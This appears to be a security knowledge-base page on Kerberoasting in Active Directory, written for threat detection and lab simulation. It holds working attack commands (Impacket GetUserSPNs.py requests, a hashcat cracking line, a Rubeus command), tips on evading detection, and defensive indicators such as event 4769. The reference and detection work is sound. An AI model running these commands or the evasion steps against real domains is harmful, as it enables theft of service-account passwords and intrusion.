Kerberoasting
Status: Scaffold — content in progress
ATT&CK: T1558.003 — Steal or Forge Kerberos Tickets: Kerberoasting
Platforms: Windows (Active Directory)
Severity: High
What It Exploits
Any authenticated domain user can request a Kerberos service ticket for any account that has a Service Principal Name (SPN). The service ticket is encrypted with the service account's NTLM hash. The attacker takes this ticket offline and cracks the hash to recover the plaintext password.
Primitive: Kerberos TGS-REP encrypted with service account's RC4 (etype 23) hash → offline brute-force with hashcat.
Attack Flow
1. Enumerate SPNs: any domain user can query LDAP for accounts with SPNs
GetUserSPNs.py ITDR/user:pass@dc01 -dc-ip 192.168.56.10
2. Request service tickets for SPN accounts
GetUserSPNs.py ITDR/user:pass@dc01 -dc-ip 192.168.56.10 -request
3. Crack tickets offline
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule
Conditions Required
- Valid domain account (any privilege level — standard user is sufficient)
- Target service account has a SPN set
- Service account has a crackable password
CTI Examples
Scattered Spider / UNC3944 has been reported to use Kerberoasting as a post-access privilege escalation technique in enterprise environments.
Evidence label: Reported | Confidence: Medium | Source reliability: B2 (multiple public vendor reports, corroborated)
APT29 (Cozy Bear) has used credential access techniques including service ticket abuse in targeted intrusions.
Evidence label: Reported | Confidence: Medium | Source reliability: B2
Ransomware operators (multiple groups) routinely use Kerberoasting as a standard escalation step after initial access.
Evidence label: Observed | Confidence: High | Source reliability: A1 (incident response reports)
OPSEC Variations
| Variation | Detection Evasion |
|---|---|
| Request only AES tickets (etype 17/18) | AES requests look less anomalous but are harder to crack |
| Limit request rate | Avoid bulk SPN requests in short time window |
| Target only accounts with weak password indicators | RC4-downgrade request is noisy |
| Use existing user session (no new auth) | Blends with normal user activity |
Behavioral Indicators
- Multiple 4769 events (Kerberos service ticket requests) from a single source in a short timeframe
- 4769 with
TicketEncryptionType=0x17(RC4) — suspicious when targeting accounts that support AES - LDAP queries for
(servicePrincipalName=*)from non-standard sources - Unusual account requesting tickets for services it has no business accessing
Tools
| Tool | Command |
|---|---|
| Impacket GetUserSPNs.py | GetUserSPNs.py domain/user:pass@dc -request |
| Rubeus (Windows) | Rubeus.exe kerberoast /stats /outfile:hashes.txt |
| PowerView | Get-DomainUser -SPN |
| BloodHound | Automatically maps Kerberoastable accounts |
Cross-Links
| Topic | Link |
|---|---|
| Kerberos Protocol | kerberos |
| Detection | detect-kerberoasting |
| Lab Simulation | domain-compromise-chain |